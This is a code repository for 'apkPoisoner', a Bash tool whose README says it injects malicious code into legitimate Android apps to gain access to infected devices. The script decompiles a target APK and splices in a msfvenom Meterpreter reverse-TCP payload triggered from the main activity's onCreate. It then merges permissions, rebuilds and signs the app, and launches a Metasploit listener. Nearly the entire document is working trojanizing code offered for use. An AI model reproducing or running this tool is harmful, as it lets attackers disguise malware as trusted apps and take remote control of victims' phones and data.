├── video
    └── apkpoisoner_poc.gif
├── README.md
└── apkPoisoner.sh


/video/apkpoisoner_poc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Invertebr4do/apkPoisoner/HEAD/video/apkpoisoner_poc.gif


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # apkPoisoner
 2 | Tool made to inject malicious code inside a legitimate apk in order to gain access to the infected device.
 3 | 
 4 | # DEPENDENCIES
 5 |  - java
 6 |  - metasploit-framework
 7 |  - zipalign
 8 |  - sponge
 9 |  - wget
10 | 
11 | # INSTALLATION
12 | 
13 | ```bash
14 | git clone https://github.com/Invertebr4do/apkPoisoner.git
15 | cd apkPoisoner && chmod +x apkPoisoner.sh
16 | ```
17 | 
18 | # USAGE
19 | 
20 | ```bash
21 | ./apkPoisoner.sh -i [IP_ADDRESS] -p [LOCAL_PORT] -a /PATH/TO/APK.apk 
22 | ```
23 | > The malicious apk file is saved on **[APKPOISONER_DIRECTORY]/out/POISONED_[APP_NAME].apk**
24 | 
25 | ![](https://github.com/Invertebr4do/apkPoisoner/blob/main/video/apkpoisoner_poc.gif)
26 | 


--------------------------------------------------------------------------------
/apkPoisoner.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | #Colors
  4 | green="\e[0;32m\033[1m"
  5 | end="\033[0m\e[0m"
  6 | red="\e[0;31m\033[1m"
  7 | blue="\e[0;34m\033[1m"
  8 | yellow="\e[0;33m\033[1m"
  9 | purple="\e[0;35m\033[1m"
 10 | turquoise="\e[0;36m\033[1m"
 11 | gray="\e[0;37m\033[1m"
 12 | 
 13 | function ctrl_c(){
 14 | 	echo -e "\n${red}[!] Exiting...${end}"
 15 | 	tput cnorm; exit 1
 16 | }
 17 | 
 18 | trap ctrl_c INT
 19 | 
 20 | tty_size=$(stty size | awk 'NF{print $NF}')
 21 | 
 22 | function banner(){
 23 |   clear
 24 | 	echo -e " ${turquoise}▄▄▄       ██▓███   ██ ▄█▀ ██▓███   ▒█████   ██▓  ██████  ▒█████   ███▄    █ ▓█████  ██▀███${end}  "
 25 | 	echo -e "${turquoise}▒████▄    ▓██░  ██▒ ██▄█▒ ▓██░  ██▒▒██▒  ██▒▓██▒▒██    ▒ ▒██▒  ██▒ ██ ▀█   █ ▓█   ▀ ▓██ ▒ ██▒${end}"
 26 | 	echo -e "${turquoise}▒██  ▀█▄  ▓██░ ██▓▒▓███▄░ ▓██░ ██▓▒▒██░  ██▒▒██▒░ ▓██▄   ▒██░  ██▒▓██  ▀█ ██▒▒███   ▓██ ░▄█ ▒\t\t\t\t\tＩＮＶＥＲＴＥＢＲＡＤＯ${end}"
 27 | 	echo -e "${turquoise}░██▄▄▄▄██ ▒██▄█▓▒ ▒▓██ █▄ ▒██▄█▓▒ ▒▒██   ██░░██░  ▒   ██▒▒██   ██░▓██▒  ▐▌██▒▒▓█  ▄ ▒██▀▀█▄  \t\t\t\t${gray}GITHUB ${turquoise}https://github.com/invertebr4do${end}"
 28 | 	echo -e " ${turquoise}▓█   ▓██▒▒██▒ ░  ░▒██▒ █▄▒██▒ ░  ░░ ████▓▒░░██░▒██████▒▒░ ████▓▒░▒██░   ▓██░░▒████▒░██▓ ▒██▒\t\t\t${gray}LINKEDIN ${turquoise}https://www.linkedin.com/in/andres-ramos-invertebrado${end}"
 29 | 	echo -e " ${blue}▒▒   ▓▒█░▒▓▒░ ░  ░▒ ▒▒ ▓▒▒▓▒░ ░  ░░ ▒░▒░▒░ ░▓  ▒ ▒▓▒ ▒ ░░ ▒░▒░▒░ ░ ▒░   ▒ ▒ ░░ ▒░ ░░ ▒▓ ░▒▓░${end}"
 30 | 	echo -e "  ${blue}▒   ▒▒ ░░▒ ░     ░ ░▒ ▒░░▒ ░       ░ ▒ ▒░  ▒ ░░ ░▒  ░ ░  ░ ▒ ▒░ ░ ░░   ░ ▒░ ░ ░  ░  ░▒ ░ ▒░${end}"
 31 | 	echo -e "  ${purple}░   ▒   ░░       ░ ░░ ░ ░░       ░ ░ ░ ▒   ▒ ░░  ░  ░  ░ ░ ░ ▒     ░   ░ ░    ░     ░░   ░ ${end}"
 32 | 	echo -e "      ${purple}░  ░         ░  ░                ░ ░   ░        ░      ░ ░           ░    ░  ░   ░     ${end}\n"
 33 |   for i in $(seq 1 $tty_size); do echo -ne ${purple}─${end}; done; echo
 34 | }
 35 | 
 36 | function helpPanel(){
 37 |   echo -e "\n${red}[!] Uso: $0"
 38 |   for i in $(seq 1 80); do echo -ne ${red}─${end}; done
 39 |   echo -e "\n\n\t${blue}\u2503${end}  ${purple}[-i]${end} ${yellow}Local IP/Host.${end}"
 40 |   echo -e "\t${blue}\u2503${end}  ${purple}[-p]${end} ${yellow}Local port.${end}"
 41 |   echo -e "\t${blue}\u2503${end}  ${purple}[-a]${end} ${yellow}Target APK file.${end}"
 42 |   echo -e "\t${blue}\u2503${end}  ${purple}[-h]${end} ${yellow}Show this help panel.${end}\n"
 43 | }
 44 | 
 45 | function compileYsign(){
 46 | 	echo -e "${purple}╚═ ${blue}Building ${green}$appDir${blue} application...${end}"
 47 | 	java -jar $toolsDir/apktool*.jar -q b $appDir -o modified-$appDir.apk 2>/dev/null
 48 |   if [ "$(echo $?)" != "0" ]; then
 49 |     echo -e "\n${red}═════╝ Building failed ╔═════${end}"
 50 |     tput cnorm; exit 1
 51 |   fi
 52 |   sleep 0.5; echo -e "${blue}╚═ Signing ${green}$appDir${blue} application...${end}" 
 53 |   java -jar $toolsDir/uber-apk-signer*.jar --apks modified-$appDir.apk &>/dev/null
 54 |   if [ "$(echo $?)" != "0" ]; then
 55 |     echo -e "\n${red}═════╝ Signing failed ╔═════${end}"
 56 |     tput cnorm; exit 1
 57 |   fi
 58 | }
 59 | 
 60 | function editPermissions(){
 61 | 	echo -e "${purple}╚═ ${blue}Modifying ${green}uses-permission${blue} permissions...${end}"
 62 | 	cat AndroidManifest.xml | grep "uses-permission" > ../permissions.txt 2>/dev/null && popd &>/dev/null
 63 | 	cat $appDir/AndroidManifest.xml | grep "uses-permission" >> permissions.txt
 64 | 	cat permissions.txt | sort -u | sponge permissions.txt
 65 | 	cat $appDir/AndroidManifest.xml | sed '0,/.*uses-permission.*/s// apk-poisoner-place2set-permissions/' | grep -v "<uses-permission" | sponge $appDir/AndroidManifest.xml
 66 | 	cat permissions.txt | tr -d '\n' | sed 's/\/>/\/>\\n/g' | sponge permissions.txt
 67 | 	permissions=$(cat permissions.txt | sed 's/\//\\\//g')
 68 | 	cat $appDir/AndroidManifest.xml | sed 's/apk-poisoner-place2set-permissions/'"$permissions"'/' | sed 's/\\n/\n/g' | sponge $appDir/AndroidManifest.xml
 69 | }
 70 | 
 71 | function mkYdMsfApk(){
 72 | 	popd &>/dev/null
 73 | 	echo -e "${purple}╚═ ${blue}Creating ${green}msf${blue} application...${end}"
 74 | 	msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -o msf.apk &>/dev/null
 75 | 	
 76 | 	if [[ $(echo $?) -eq 0 ]]; then
 77 | 		echo -e "${purple}╚═ ${blue}Decompiling ${green}msf${blue} application...${end}"
 78 | 		java -jar $toolsDir/apktool*.jar -q d msf.apk 2>/dev/null && pushd msf &>/dev/null
 79 | 		tar -cf - smali | ( cd ../$appDir; tar -xpf - )
 80 | 		popd &>/dev/null && pushd msf &>/dev/null
 81 | 	else
 82 | 		echo -e "\n${red}═════╝ MSFVENOM returned an error during the creation of the malicious apk ╔═════${end}"
 83 | 	fi
 84 | }
 85 | 
 86 | function editActivity(){
 87 | 	echo -e "${purple}╚═ ${blue}Editting the ${green}$mActivityName.smali${blue} activity...${end}"
 88 |   payload=$(echo 'invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V' | sed 's/\//\\\//g')
 89 |   cat $mActivityLocation | sed "s/ onCreate(Landroid\/os\/Bundle;)V/ onCreate(Landroid\/os\/Bundle;)V\n    $payload/g" | sponge $mActivityLocation
 90 | }
 91 | 
 92 | function findActivity(){
 93 | 	echo -e "${purple}╚═ ${blue}Searching the ${green}MainActivity.smali${blue} file...${end}"
 94 | 	
 95 | 	cat $mActivityLocation | grep 'onCreate(Landroid/os/Bundle;)V' &>/dev/null
 96 | 	
 97 | 	if [[ $(echo $?) -eq 0 ]]; then
 98 | 		echo -ne $mActivityLocation &>/dev/null
 99 | 	else
100 | 		echo -e "\n${red}═════╝ onCreate method not found ╔═════${end}"
101 |     tput cnorm; exit 1
102 | 	fi	
103 | }
104 | 
105 | function decompile(){
106 | 	echo -e "${blue}╗${end}\n${purple}╚═ ${blue}Decompiling ${green}$appDir${blue} application...${end}"
107 | 	java -jar $toolsDir/apktool*.jar -q d $targetAPK 2>/dev/null && pushd $appDir &>/dev/null
108 | }
109 | 
110 | function getTools(){
111 |   mkdir Tools
112 |   wget -q https://github.com/patrickfav/uber-apk-signer/releases/download/v1.3.0/uber-apk-signer-1.3.0.jar
113 |   wget -q https://github.com/iBotPeaches/Apktool/releases/download/v2.9.3/apktool_2.9.3.jar
114 |   mv {apktool*.jar,uber-apk-signer*.jar} Tools
115 | }
116 | 
117 | # ~ ~ ~ MAIN ~ ~ ~
118 | 
119 | declare -i parameter_counter=0; while getopts ":i:p:a:h:" arg; do
120 |   case $arg in
121 |     i) lhost=$OPTARG; let parameter_counter+=1;;
122 |     p) lport=$OPTARG; let parameter_counter+=1;;
123 |     a) targetAPK=$OPTARG; let parameter_counter+=1;;
124 |     h) helpPanel;;
125 |   esac
126 | done
127 | 
128 | tput civis; if [[ $parameter_counter -eq 0 || $parameter_counter -ne 3 ]]; then
129 |   helpPanel
130 | else
131 |     rm -rf apkPoisoning; mkdir apkPoisoning 2>/dev/null; cp $targetAPK apkPoisoning && cd apkPoisoning
132 |     targetAPK=$(echo $targetAPK | tr '/' '\n' | tail -n 1)
133 |   
134 |   if [[ $(file $targetAPK | grep -oP "\.apk:.*?\(APK\)") == ".apk: Android package (APK)" ]]; then
135 |     banner
136 |     getTools
137 |     toolsDir=$(cd Tools && pwd)
138 |     appDir=$(echo $targetAPK | sed 's/\.apk//g' | sed 's/\.\///')
139 | 		decompile; sleep 0.4
140 |     mActivityName=$(cat AndroidManifest.xml | grep "<activity" -A 30 | grep "MAIN" -B 30 | grep -oP '<activity .*?android:name=".*?".*?>' | grep -oP '".*?"' | tr -d '"' | grep -oP "^\w+\.\w+.*" | tr '.' '\n' | tail -n 1)
141 | 		mActivityLocation=$(find . -name $mActivityName.smali)
142 |     findActivity; sleep 0.4
143 | 		editActivity; sleep 0.4
144 | 		mkYdMsfApk; sleep 0.4
145 | 		editPermissions; sleep 0.4
146 | 		compileYsign; sleep 0.4
147 | 		rm -rf $appDir msf msf.apk permissions.txt modified-$appDir-aligned-debugSigned.apk.idsig modified-$appDir.apk
148 |     mkdir ../out 2>/dev/null
149 |     mv modified-$appDir-aligned-debugSigned.apk ../out/POISONED-$appDir.apk && cd ..; rm -rf apkPoisoning 2>/dev/null
150 | 		echo -e "${blue}╗                                                               ╔${end}"; sleep 0.2
151 | 		echo -e "${purple}╚════════════════════════════${blue}╝${green} 𝘿𝙤𝙣𝙚 ${blue}╔═${purple}══════════════════════════╝${end}"
152 | 		echo -e "${gray}                 (Starting metasploit listener...)${end}\n"; sleep 0.5
153 | 		tput cnorm; msfconsole -q -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT $lport; exploit"
154 | 	else
155 |     if [[ $(file $targetAPK | grep -oP "\.apk:.*?\(APK\)") != ".apk: Android package (APK)" ]]; then
156 |       echo -e "${red}[!] ($targetAPK): Invalid apk file path${end}"
157 |     fi
158 |   fi
159 | fi; tput cnorm
160 | 


--------------------------------------------------------------------------------